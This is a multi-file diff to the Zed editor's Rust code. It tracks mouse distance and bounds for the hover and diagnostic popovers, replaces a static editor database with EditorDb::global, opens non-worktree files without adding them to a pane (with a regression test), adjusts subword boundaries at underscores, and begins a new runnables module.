let keyboard_grace = Rc::clone(&self.keyboard_grace);
+ let this = cx.entity().downgrade();
+ let bounds_cell = self.last_bounds.clone();
div()
.id("info_popover")
.occlude()
.elevation_2(cx)
+ .child(
+ canvas(
+ {
+ move |bounds, _window, _cx| {
+ bounds_cell.set(Some(bounds));
+ }
+ },
+ |_, _, _, _| {},
+ )
+ .absolute()
+ .size_full(),
+ )
// Prevent a mouse down/move on the popover from being propagated to the editor,
// because that would dismiss the popover.
- .on_mouse_move(|_, _, cx| cx.stop_propagation())
+ .on_mouse_move({
+ move |_, _, cx: &mut App| {
+ this.update(cx, |editor, _| {
+ editor.hover_state.closest_mouse_distance = Some(px(0.0));
+ editor.hover_state.hiding_delay_task = None;
+ })
+ .ok();
+ cx.stop_propagation()
+ }
+ })
.on_mouse_down(MouseButton::Left, move |_, _, cx| {
let mut keyboard_grace = keyboard_grace.borrow_mut();
*keyboard_grace = false;
@@ -957,6 +1075,7 @@ pub struct DiagnosticPopover {
background_color: Hsla,
pub keyboard_grace: Rc<RefCell<bool>>,
pub anchor: Anchor,
+ pub last_bounds: Rc<Cell<Option<Bounds<Pixels>>>>,
_subscription: Subscription,
pub scroll_handle: ScrollHandle,
}
@@ -970,10 +1089,23 @@ impl DiagnosticPopover {
) -> AnyElement {
let keyboard_grace = Rc::clone(&self.keyboard_grace);
let this = cx.entity().downgrade();
+ let bounds_cell = self.last_bounds.clone();
div()
.id("diagnostic")
.occlude()
.elevation_2_borderless(cx)
+ .child(
+ canvas(
+ {
+ move |bounds, _window, _cx| {
+ bounds_cell.set(Some(bounds));
+ }
+ },
+ |_, _, _, _| {},
+ )
+ .absolute()
+ .size_full(),
+ )
// Don't draw the background color if the theme
// allows transparent surfaces.
.when(theme_is_transparent(cx), |this| {
@@ -981,7 +1113,17 @@ impl DiagnosticPopover {
})
// Prevent a mouse move on the popover from being propagated to the editor,
// because that would dismiss the popover.
- .on_mouse_move(|_, _, cx| cx.stop_propagation())
+ .on_mouse_move({
+ let this = this.clone();
+ move |_, _, cx: &mut App| {
+ this.update(cx, |editor, _| {
+ editor.hover_state.closest_mouse_distance = Some(px(0.0));
+ editor.hover_state.hiding_delay_task = None;
+ })
+ .ok();
+ cx.stop_propagation()
+ }
+ })
// Prevent a mouse down on the popover from being propagated to the editor,
// because that would move the cursor.
.on_mouse_down(MouseButton::Left, move |_, _, cx| {
@@ -1151,7 +1293,7 @@ mod tests {
let anchor = snapshot
.buffer_snapshot()
.anchor_before(hover_point.to_offset(&snapshot, Bias::Left));
- hover_at(editor, Some(anchor), window, cx)
+ hover_at(editor, Some(anchor), None, window, cx)
});
assert!(!cx.editor(|editor, _window, _cx| editor.hover_state.visible()));
@@ -1251,7 +1393,7 @@ mod tests {
let anchor = snapshot
.buffer_snapshot()
.anchor_before(hover_point.to_offset(&snapshot, Bias::Left));
- hover_at(editor, Some(anchor), window, cx)
+ hover_at(editor, Some(anchor), None, window, cx)
});
cx.background_executor
.advance_clock(Duration::from_millis(get_hover_popover_delay(&cx) + 100));
@@ -1289,7 +1431,7 @@ mod tests {
let anchor = snapshot
.buffer_snapshot()
.anchor_before(hover_point.to_offset(&snapshot, Bias::Left));
- hover_at(editor, Some(anchor), window, cx)
+ hover_at(editor, Some(anchor), None, window, cx)
});
assert!(!cx.editor(|editor, _window, _cx| editor.hover_state.visible()));
@@ -1343,7 +1485,7 @@ mod tests {
let anchor = snapshot
.buffer_snapshot()
.anchor_before(hover_point.to_offset(&snapshot, Bias::Left));
- hover_at(editor, Some(anchor), window, cx)
+ hover_at(editor, Some(anchor), None, window, cx)
});
cx.background_executor
.advance_clock(Duration::from_millis(get_hover_popover_delay(&cx) + 100));
@@ -1752,6 +1894,7 @@ mod tests {
editor.update_inlay_link_and_hover_points(
&editor.snapshot(window, cx),
new_type_hint_part_hover_position,
+ None,
true,
false,
window,
@@ -1822,6 +1965,7 @@ mod tests {
editor.update_inlay_link_and_hover_points(
&editor.snapshot(window, cx),
new_type_hint_part_hover_position,
+ None,
true,
false,
window,
@@ -1877,6 +2021,7 @@ mod tests {
editor.update_inlay_link_and_hover_points(
&editor.snapshot(window, cx),
struct_hint_part_hover_position,
+ None,
true,
false,
window,
@@ -7,7 +7,7 @@ use std::{
use clock::Global;
use collections::{HashMap, HashSet};
use futures::future::join_all;
-use gpui::{App, Entity, Task};
+use gpui::{App, Entity, Pixels, Task};
use itertools::Itertools;
use language::{
BufferRow,
@@ -292,7 +292,7 @@ impl Editor {
reason: InlayHintRefreshReason,
cx: &mut Context<Self>,
) {
- if !self.mode().is_full() || self.inlay_hints.is_none() {
+ if !self.lsp_data_enabled() || self.inlay_hints.is_none() {
return;
}
let Some(semantics_provider) = self.semantics_provider() else {
@@ -569,6 +569,7 @@ impl Editor {
&mut self,
snapshot: &EditorSnapshot,
point_for_position: PointForPosition,
+ mouse_position: Option<gpui::Point<Pixels>>,
secondary_held: bool,
shift_held: bool,
window: &mut Window,
@@ -748,7 +749,7 @@ impl Editor {
self.hide_hovered_link(cx)
}
if !hover_updated {
- hover_popover::hover_at(self, None, window, cx);
+ hover_popover::hover_at(self, None, mouse_position, window, cx);
}
}
@@ -4,7 +4,7 @@ use crate::{
NavigationData, ReportEditorEvent, SelectionEffects, ToPoint as _,
display_map::HighlightKey,
editor_settings::SeedQuerySetting,
- persistence::{DB, SerializedEditor},
+ persistence::{EditorDb, SerializedEditor},
scroll::{ScrollAnchor, ScrollOffset},
};
use anyhow::{Context as _, Result, anyhow};
@@ -14,12 +14,12 @@ use fs::MTime;
use futures::future::try_join_all;
use git::status::GitSummary;
use gpui::{
- AnyElement, App, AsyncWindowContext, Context, Entity, EntityId, EventEmitter, IntoElement,
- ParentElement, Pixels, SharedString, Styled, Task, WeakEntity, Window, point,
+ AnyElement, App, AsyncWindowContext, Context, Entity, EntityId, EventEmitter, Font,
+ IntoElement, ParentElement, Pixels, SharedString, Styled, Task, WeakEntity, Window, point,
};
use language::{
- Bias, Buffer, BufferRow, CharKind, CharScopeContext, LocalFile, Point, SelectionGoal,
- proto::serialize_anchor as serialize_text_anchor,
+ Bias, Buffer, BufferRow, CharKind, CharScopeContext, HighlightedText, LocalFile, Point,
+ SelectionGoal, proto::serialize_anchor as serialize_text_anchor,
};
use lsp::DiagnosticSeverity;
use multi_buffer::MultiBufferOffset;
@@ -41,6 +41,7 @@ use std::{
use text::{BufferId, BufferSnapshot, Selection};
use ui::{IconDecorationKind, prelude::*};
use util::{ResultExt, TryFutureExt, paths::PathExt};
+use workspace::item::{Dedup, ItemSettings, SerializableItem, TabContentParams};
use workspace::{
CollaboratorId, ItemId, ItemNavHistory, ToolbarItemLocation, ViewId, Workspace, WorkspaceId,
invalid_item_view::InvalidItemView,
@@ -51,12 +52,8 @@ use workspace::{
},
};
use workspace::{
- OpenOptions,
- item::{Dedup, ItemSettings, SerializableItem, TabContentParams},
-};
-use workspace::{
- OpenVisible, Pane, WorkspaceSettings,
- item::{BreadcrumbText, FollowEvent, ProjectItemKind},
+ Pane, WorkspaceSettings,
+ item::{FollowEvent, ProjectItemKind},
searchable::SearchOptions,
};
use zed_actions::preview::{
@@ -981,9 +978,10 @@ impl Item for Editor {
}
// In a non-singleton case, the breadcrumbs are actually shown on sticky file headers of the multibuffer.
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
if self.buffer.read(cx).is_singleton() {
- self.breadcrumbs_inner(cx)
+ let font = theme::ThemeSettings::get_global(cx).buffer_font.clone();
+ Some((self.breadcrumbs_inner(cx)?, Some(font)))
} else {
None
}
@@ -1137,18 +1135,24 @@ impl SerializableItem for Editor {
_window: &mut Window,
cx: &mut App,
) -> Task<Result<()>> {
- workspace::delete_unloaded_items(alive_items, workspace_id, "editors", &DB, cx)
+ workspace::delete_unloaded_items(
+ alive_items,
+ workspace_id,
+ "editors",
+ &EditorDb::global(cx),
+ cx,
+ )
}
fn deserialize(
project: Entity<Project>,
- workspace: WeakEntity<Workspace>,
+ _workspace: WeakEntity<Workspace>,
workspace_id: workspace::WorkspaceId,
item_id: ItemId,
window: &mut Window,
cx: &mut App,
) -> Task<Result<Entity<Self>>> {
- let serialized_editor = match DB
+ let serialized_editor = match EditorDb::global(cx)
.get_serialized_editor(item_id, workspace_id)
.context("Failed to query editor state")
{
@@ -1266,42 +1270,33 @@ impl SerializableItem for Editor {
})
}),
None => {
- // File is not in any worktree (e.g., opened as a standalone file)
- // We need to open it via workspace and then restore dirty contents
+ // File is not in any worktree (e.g., opened as a standalone file).
+ // Open the buffer directly via the project rather than through
+ // workspace.open_abs_path(), which has the side effect of adding
+ // the item to a pane. The caller (deserialize_to) will add the
+ // returned item to the correct pane.
window.spawn(cx, async move |cx| {
- let open_by_abs_path =
- workspace.update_in(cx, |workspace, window, cx| {
- workspace.open_abs_path(
- abs_path.clone(),
- OpenOptions {
- visible: Some(OpenVisible::None),
- ..Default::default()
- },
- window,
- cx,
- )
+ let buffer = project
+ .update(cx, |project, cx| project.open_local_buffer(&abs_path, cx))
+ .await
+ .with_context(|| {
+ format!("Failed to open buffer for {abs_path:?}")
})?;
- let editor =
- open_by_abs_path.await?.downcast::<Editor>().with_context(
- || format!("path {abs_path:?} cannot be opened as an Editor"),
- )?;
if let Some(contents) = contents {
- editor.update_in(cx, |editor, _window, cx| {
- if let Some(buffer) = editor.buffer().read(cx).as_singleton() {
- buffer.update(cx, |buffer, cx| {
- restore_serialized_buffer_contents(
- buffer, contents, mtime, cx,
- );
- });
- }
- })?;
+ buffer.update(cx, |buffer, cx| {
+ restore_serialized_buffer_contents(buffer, contents, mtime, cx);
+ });
}
- editor.update_in(cx, |editor, window, cx| {
- editor.read_metadata_from_db(item_id, workspace_id, window, cx);
- })?;
- Ok(editor)
+ cx.update(|window, cx| {
+ cx.new(|cx| {
+ let mut editor =
+ Editor::for_buffer(buffer, Some(project), window, cx);
+ editor.read_metadata_from_db(item_id, workspace_id, window, cx);
+ editor
+ })
+ })
})
}
}
@@ -1372,6 +1367,7 @@ impl SerializableItem for Editor {
let snapshot = buffer.read(cx).snapshot();
+ let db = EditorDb::global(cx);
Some(cx.spawn_in(window, async move |_this, cx| {
cx.background_spawn(async move {
let (contents, language) = if serialize_dirty_buffers && is_dirty {
@@ -1389,7 +1385,7 @@ impl SerializableItem for Editor {
mtime,
};
log::debug!("Serializing editor {item_id:?} in workspace {workspace_id:?}");
- DB.save_serialized_editor(item_id, workspace_id, editor)
+ db.save_serialized_editor(item_id, workspace_id, editor)
.await
.context("failed to save serialized editor")
})
@@ -1649,14 +1645,9 @@ impl SearchableItem for Editor {
match setting {
SeedQuerySetting::Never => String::new(),
SeedQuerySetting::Selection | SeedQuerySetting::Always if !selection.is_empty() => {
- let text: String = buffer_snapshot
+ buffer_snapshot
.text_for_range(selection.start..selection.end)
- .collect();
- if text.contains('\n') {
- String::new()
- } else {
- text
- }
+ .collect()
}
SeedQuerySetting::Selection => String::new(),
SeedQuerySetting::Always => {
@@ -1971,6 +1962,8 @@ pub fn entry_git_aware_label_color(git_status: GitSummary, ignored: bool, select
let tracked = git_status.index + git_status.worktree;
if git_status.conflict > 0 {
Color::Conflict
+ } else if tracked.deleted > 0 {
+ Color::Deleted
} else if tracked.modified > 0 {
Color::Modified
} else if tracked.added > 0 || git_status.untracked > 0 {
@@ -2066,6 +2059,7 @@ mod tests {
use gpui::{App, VisualTestContext};
use language::TestFile;
use project::FakeFs;
+ use serde_json::json;
use std::path::{Path, PathBuf};
use util::{path, rel_path::RelPath};
@@ -2118,7 +2112,9 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let workspace_id = db.next_id().await.unwrap();
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
let item_id = 1234 as ItemId;
let mtime = fs
.metadata(Path::new(path!("/file.rs")))
@@ -2134,7 +2130,8 @@ mod tests {
mtime: Some(mtime),
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor.clone())
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor.clone())
.await
.unwrap();
@@ -2157,8 +2154,10 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
let item_id = 5678 as ItemId;
let serialized_editor = SerializedEditor {
@@ -2168,7 +2167,8 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor)
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
.await
.unwrap();
@@ -2197,8 +2197,10 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
let item_id = 9012 as ItemId;
let serialized_editor = SerializedEditor {
@@ -2208,7 +2210,8 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor)
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
.await
.unwrap();
@@ -2235,8 +2238,10 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
let item_id = 9345 as ItemId;
let old_mtime = MTime::from_seconds_and_nanos(0, 50);
@@ -2247,7 +2252,8 @@ mod tests {
mtime: Some(old_mtime),
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor)
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
.await
.unwrap();
@@ -2267,8 +2273,10 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
let item_id = 10000 as ItemId;
let serialized_editor = SerializedEditor {
@@ -2278,7 +2286,8 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor)
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
.await
.unwrap();
@@ -2309,8 +2318,10 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
let item_id = 11000 as ItemId;
let mtime = fs
@@ -2328,7 +2339,8 @@ mod tests {
mtime: Some(mtime),
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor)
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
.await
.unwrap();
@@ -2346,4 +2358,75 @@ mod tests {
});
}
}
+
+ // Regression test for https://github.com/zed-industries/zed/issues/35947
+ // Verifies that deserializing a non-worktree editor does not add the item
+ // to any pane as a side effect.
+ #[gpui::test]
+ async fn test_deserialize_non_worktree_file_does_not_add_to_pane(
+ cx: &mut gpui::TestAppContext,
+ ) {
+ init_test(cx, |_| {});
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(path!("/outside"), json!({ "settings.json": "{}" }))
+ .await;
+
+ // Project with a different root — settings.json is NOT in any worktree
+ let project = Project::test(fs.clone(), [], cx).await;
+ let (multi_workspace, cx) =
+ cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
+
+ let workspace_id = db.next_id().await.unwrap();
+ let item_id = 99999 as ItemId;
+
+ let serialized_editor = SerializedEditor {
+ abs_path: Some(PathBuf::from(path!("/outside/settings.json"))),
+ contents: None,
+ language: None,
+ mtime: None,
+ };
+
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
+ .await
+ .unwrap();
+
+ // Count items in all panes before deserialization
+ let pane_items_before = workspace.read_with(cx, |workspace, cx| {
+ workspace
+ .panes()
+ .iter()
+ .map(|pane| pane.read(cx).items_len())
+ .sum::<usize>()
+ });
+
+ let deserialized =
+ deserialize_editor(item_id, workspace_id, workspace.clone(), project, cx).await;
+
+ cx.run_until_parked();
+
+ // The editor should exist and have the file
+ deserialized.update(cx, |editor, cx| {
+ let buffer = editor.buffer().read(cx).as_singleton().unwrap().read(cx);
+ assert!(buffer.file().is_some());
+ });
+
+ // No items should have been added to any pane as a side effect
+ let pane_items_after = workspace.read_with(cx, |workspace, cx| {
+ workspace
+ .panes()
+ .iter()
+ .map(|pane| pane.read(cx).items_len())
+ .sum::<usize>()
+ });
+
+ assert_eq!(
+ pane_items_before, pane_items_after,
+ "Editor::deserialize should not add items to panes as a side effect"
+ );
+ }
}
@@ -50,7 +50,7 @@ pub(super) fn refresh_linked_ranges(
window: &mut Window,
cx: &mut Context<Editor>,
) -> Option<()> {
- if !editor.mode().is_full() || editor.pending_rename.is_some() {
+ if !editor.lsp_data_enabled() || editor.pending_rename.is_some() {
return None;
}
let project = editor.project()?.downgrade();
@@ -286,13 +286,7 @@ pub fn deploy_context_menu(
.separator()
.action_disabled_when(
!has_reveal_target,
- if cfg!(target_os = "macos") {
- "Reveal in Finder"
- } else if cfg!(target_os = "windows") {
- "Reveal in File Explorer"
- } else {
- "Reveal in File Manager"
- },
+ ui::utils::reveal_in_file_manager_label(false),
Box::new(RevealInFileManager),
)
.when(is_markdown, |builder| {
@@ -408,7 +408,7 @@ pub fn previous_subword_start(map: &DisplaySnapshot, point: DisplayPoint) -> Dis
let classifier = map.buffer_snapshot().char_classifier_at(raw_point);
find_preceding_boundary_display_point(map, point, FindRange::MultiLine, &mut |left, right| {
- is_subword_start(left, right, &classifier) || left == '\n'
+ is_subword_start(left, right, &classifier) || left == '\n' || right == '\n'
})
}
@@ -431,6 +431,7 @@ pub fn is_subword_start(left: char, right: char, classifier: &CharClassifier) ->
let is_word_start = classifier.kind(left) != classifier.kind(right) && !right.is_whitespace();
let is_subword_start = classifier.is_word('-') && left == '-' && right != '-'
|| left == '_' && right != '_'
+ || left != '_' && right == '_'
|| left.is_lowercase() && right.is_uppercase();
is_word_start || is_subword_start
}
@@ -484,7 +485,7 @@ pub fn next_subword_end(map: &DisplaySnapshot, point: DisplayPoint) -> DisplayPo
let classifier = map.buffer_snapshot().char_classifier_at(raw_point);
find_boundary(map, point, FindRange::MultiLine, &mut |left, right| {
- is_subword_end(left, right, &classifier) || right == '\n'
+ is_subword_end(left, right, &classifier) || left == '\n' || right == '\n'
})
}
@@ -519,6 +520,7 @@ pub fn is_subword_end(left: char, right: char, classifier: &CharClassifier) -> b
fn is_subword_boundary_end(left: char, right: char, classifier: &CharClassifier) -> bool {
classifier.is_word('-') && left != '-' && right == '-'
|| left != '_' && right == '_'
+ || left == '_' && right != '_'
|| left.is_lowercase() && right.is_uppercase()
}
@@ -973,10 +975,10 @@ mod tests {
}
// Subword boundaries are respected
- assert("lorem_ˇipˇsum", cx);
+ assert("loremˇ_ˇipsum", cx);
assert("lorem_ˇipsumˇ", cx);
- assert("ˇlorem_ˇipsum", cx);
- assert("lorem_ˇipsum_ˇdolor", cx);
+ assert("ˇloremˇ_ipsum", cx);
+ assert("lorem_ˇipsumˇ_dolor", cx);
assert("loremˇIpˇsum", cx);
assert("loremˇIpsumˇ", cx);
@@ -1156,10 +1158,10 @@ mod tests {
}
// Subword boundaries are respected
- assert("loˇremˇ_ipsum", cx);
+ assert("loremˇ_ˇipsum", cx);
assert("ˇloremˇ_ipsum", cx);
- assert("loremˇ_ipsumˇ", cx);
- assert("loremˇ_ipsumˇ_dolor", cx);
+ assert("loremˇ_ˇipsum", cx);
+ assert("lorem_ˇipsumˇ_dolor", cx);
assert("loˇremˇIpsum", cx);
assert("loremˇIpsumˇDolor", cx);
@@ -1172,7 +1174,7 @@ mod tests {
assert("loremˇ ipsumˇ ", cx);
assert("loremˇ-ˇipsum", cx);
assert("loremˇ#$@-ˇipsum", cx);
- assert("loremˇ_ipsumˇ", cx);
+ assert("loremˇ_ˇipsum", cx);
assert(" ˇbcˇΔ", cx);
assert(" abˇ——ˇcd", cx);
}
@@ -226,7 +226,7 @@ impl Domain for EditorDb {
];
}
-db::static_connection!(DB, EditorDb, [WorkspaceDb]);
+db::static_connection!(EditorDb, [WorkspaceDb]);
// https://www.sqlite.org/limits.html
// > <..> the maximum value of a host parameter number is SQLITE_MAX_VARIABLE_NUMBER,
@@ -415,8 +415,10 @@ mod tests {
use super::*;
#[gpui::test]
- async fn test_save_and_get_serialized_editor() {
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ async fn test_save_and_get_serialized_editor(cx: &mut gpui::TestAppContext) {
+ let db = cx.update(|cx| workspace::WorkspaceDb::global(cx));
+ let workspace_id = db.next_id().await.unwrap();
+ let editor_db = cx.update(|cx| EditorDb::global(cx));
let serialized_editor = SerializedEditor {
abs_path: Some(PathBuf::from("testing.txt")),
@@ -425,11 +427,12 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(1234, workspace_id, serialized_editor.clone())
+ editor_db
+ .save_serialized_editor(1234, workspace_id, serialized_editor.clone())
.await
.unwrap();
- let have = DB
+ let have = editor_db
.get_serialized_editor(1234, workspace_id)
.unwrap()
.unwrap();
@@ -443,11 +446,12 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(1234, workspace_id, serialized_editor.clone())
+ editor_db
+ .save_serialized_editor(1234, workspace_id, serialized_editor.clone())
.await
.unwrap();
- let have = DB
+ let have = editor_db
.get_serialized_editor(1234, workspace_id)
.unwrap()
.unwrap();
@@ -461,11 +465,12 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(1234, workspace_id, serialized_editor.clone())
+ editor_db
+ .save_serialized_editor(1234, workspace_id, serialized_editor.clone())
.await
.unwrap();
- let have = DB
+ let have = editor_db
.get_serialized_editor(1234, workspace_id)
.unwrap()
.unwrap();
@@ -479,11 +484,12 @@ mod tests {
mtime: Some(MTime::from_seconds_and_nanos(100, 42)),
};
- DB.save_serialized_editor(1234, workspace_id, serialized_editor.clone())
+ editor_db
+ .save_serialized_editor(1234, workspace_id, serialized_editor.clone())
.await
.unwrap();
- let have = DB
+ let have = editor_db
.get_serialized_editor(1234, workspace_id)
.unwrap()
.unwrap();
@@ -499,8 +505,10 @@ mod tests {
// The search uses contains_str_at() to find fingerprints in the buffer.
#[gpui::test]
- async fn test_save_and_get_file_folds() {
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ async fn test_save_and_get_file_folds(cx: &mut gpui::TestAppContext) {
+ let db = cx.update(|cx| workspace::WorkspaceDb::global(cx));
+ let workspace_id = db.next_id().await.unwrap();
+ let editor_db = cx.update(|cx| EditorDb::global(cx));
// file_folds table uses path as key (no FK to editors table)
let file_path: Arc<Path> = Arc::from(Path::new("/tmp/test_file_folds.rs"));
@@ -520,12 +528,13 @@ mod tests {
"} // end Foo".to_string(),
),
];
- DB.save_file_folds(workspace_id, file_path.clone(), folds.clone())
+ editor_db
+ .save_file_folds(workspace_id, file_path.clone(), folds.clone())
.await
.unwrap();
// Retrieve and verify fingerprints are preserved
- let retrieved = DB.get_file_folds(workspace_id, &file_path).unwrap();
+ let retrieved = editor_db.get_file_folds(workspace_id, &file_path).unwrap();
assert_eq!(retrieved.len(), 2);
assert_eq!(
retrieved[0],
@@ -553,11 +562,12 @@ mod tests {
"impl Bar {".to_string(),
"} // end impl".to_string(),
)];
- DB.save_file_folds(workspace_id, file_path.clone(), new_folds)
+ editor_db
+ .save_file_folds(workspace_id, file_path.clone(), new_folds)
.await
.unwrap();
- let retrieved = DB.get_file_folds(workspace_id, &file_path).unwrap();
+ let retrieved = editor_db.get_file_folds(workspace_id, &file_path).unwrap();
assert_eq!(retrieved.len(), 1);
assert_eq!(
retrieved[0],
@@ -570,10 +580,11 @@ mod tests {
);
// Test delete
- DB.delete_file_folds(workspace_id, file_path.clone())
+ editor_db
+ .delete_file_folds(workspace_id, file_path.clone())
.await
.unwrap();
- let retrieved = DB.get_file_folds(workspace_id, &file_path).unwrap();
+ let retrieved = editor_db.get_file_folds(workspace_id, &file_path).unwrap();
assert!(retrieved.is_empty());
// Test multiple files don't interfere
@@ -582,15 +593,21 @@ mod tests {
let folds_a = vec![(10, 20, "a_start".to_string(), "a_end".to_string())];
let folds_b = vec![(30, 40, "b_start".to_string(), "b_end".to_string())];
- DB.save_file_folds(workspace_id, file_path_a.clone(), folds_a)
+ editor_db
+ .save_file_folds(workspace_id, file_path_a.clone(), folds_a)
.await
.unwrap();
- DB.save_file_folds(workspace_id, file_path_b.clone(), folds_b)
+ editor_db
+ .save_file_folds(workspace_id, file_path_b.clone(), folds_b)
.await
.unwrap();
- let retrieved_a = DB.get_file_folds(workspace_id, &file_path_a).unwrap();
- let retrieved_b = DB.get_file_folds(workspace_id, &file_path_b).unwrap();
+ let retrieved_a = editor_db
+ .get_file_folds(workspace_id, &file_path_a)
+ .unwrap();
+ let retrieved_b = editor_db
+ .get_file_folds(workspace_id, &file_path_b)
+ .unwrap();
assert_eq!(retrieved_a.len(), 1);
assert_eq!(retrieved_b.len(), 1);
@@ -0,0 +1,1093 @@
+use std::{collections::BTreeMap, mem, ops::Range, sync::Arc};
+
+use clock::Global;
+use collections::{HashMap, HashSet};
+use gpui::{
+ App, AppContext as _, AsyncWindowContext, ClickEvent, Context, Entity, Focusable as _,
+ MouseButton, Task, Window,
+};
+use language::{Buffer, BufferRow, Runnable};
+use lsp::LanguageServerName;
+use multi_buffer::{
+ Anchor, BufferOffset, MultiBufferOffset, MultiBufferRow, MultiBufferSnapshot, ToPoint as _,
+};
+use project::{
+ Location, Project, TaskSourceKind,
+ debugger::breakpoint_store::{Breakpoint, BreakpointSessionState},
+ project_settings::ProjectSettings,
+};
+use settings::Settings as _;
+use smallvec::SmallVec;
+use task::{ResolvedTask, RunnableTag, TaskContext, TaskTemplate, TaskVariables, VariableName};
+use text::{BufferId, OffsetRangeExt as _, ToOffset as _, ToPoint as _};
+use ui::{Clickable as _, Color, IconButton, IconSize, Toggleable as _};
+
+use crate::{
+ CodeActionSource, Editor, EditorSettings, EditorStyle, RangeToAnchorExt, SpawnNearestTask,
+ ToggleCodeActions, UPDATE_DEBOUNCE, display_map::DisplayRow,
+};
+
+#[derive(Debug)]
+pub(super) struct RunnableData {
+ runnables: HashMap<BufferId, (Global, BTreeMap<BufferRow, RunnableTasks>)>,
+ invalidate_buffer_data: HashSet<BufferId>,
+ runnables_update_task: Task<()>,
+}
+
+impl RunnableData {
+ pub fn new() -> Self {
+ Self {
+ runnables: HashMap::default(),
+ invalidate_buffer_data: HashSet::default(),
+ runnables_update_task: Task::ready(()),
+ }
+ }
+
+ pub fn runnables(
+ &self,
+ (buffer_id, buffer_row): (BufferId, BufferRow),
+ ) -> Option<&RunnableTasks> {
+ self.runnables.get(&buffer_id)?.1.get(&buffer_row)
+ }
+
+ pub fn all_runnables(&self) -> impl Iterator<Item = &RunnableTasks> {
+ self.runnables
+ .values()
+ .flat_map(|(_, tasks)| tasks.values())
+ }
+
+ pub fn has_cached(&self, buffer_id: BufferId, version: &Global) -> bool {
+ self.runnables
+ .get(&buffer_id)
+ .is_some_and(|(cached_version, _)| !version.changed_since(cached_version))
+ }
+
+ #[cfg(test)]
+ pub fn insert(
+ &mut self,
+ buffer_id: BufferId,
+ buffer_row: BufferRow,
+ version: Global,
+ tasks: RunnableTasks,
+ ) {
+ self.runnables
+ .entry(buffer_id)
+ .or_insert_with(|| (version, BTreeMap::default()))
+ .1
+ .insert(buffer_row, tasks);
+ }
+}
+
+#[derive(Clone, Debug)]
+pub struct RunnableTasks {
+ pub templates: Vec<(TaskSourceKind, TaskTemplate)>,
+ pub offset: multi_buffer::Anchor,
+ // We need the column at which the task context evaluation should take place (when we're spawning it via gutter).
+ pub column: u32,
+ // Values of all named captures, including those starting with '_'
+ pub extra_variables: HashMap<String, String>,
+ // Full range of the tagged region. We use it to determine which `extra_variables` to grab for context resolution in e.g. a modal.
+ pub context_range: Range<BufferOffset>,
+}
+
+impl RunnableTasks {
+ pub fn resolve<'a>(
+ &'a self,
+ cx: &'a task::TaskContext,
+ ) -> impl Iterator<Item = (TaskSourceKind, ResolvedTask)> + 'a {
+ self.templates.iter().filter_map(|(kind, template)| {
+ template
+ .resolve_task(&kind.to_id_base(), cx)
+ .map(|task| (kind.clone(), task))
+ })
+ }
+}
+
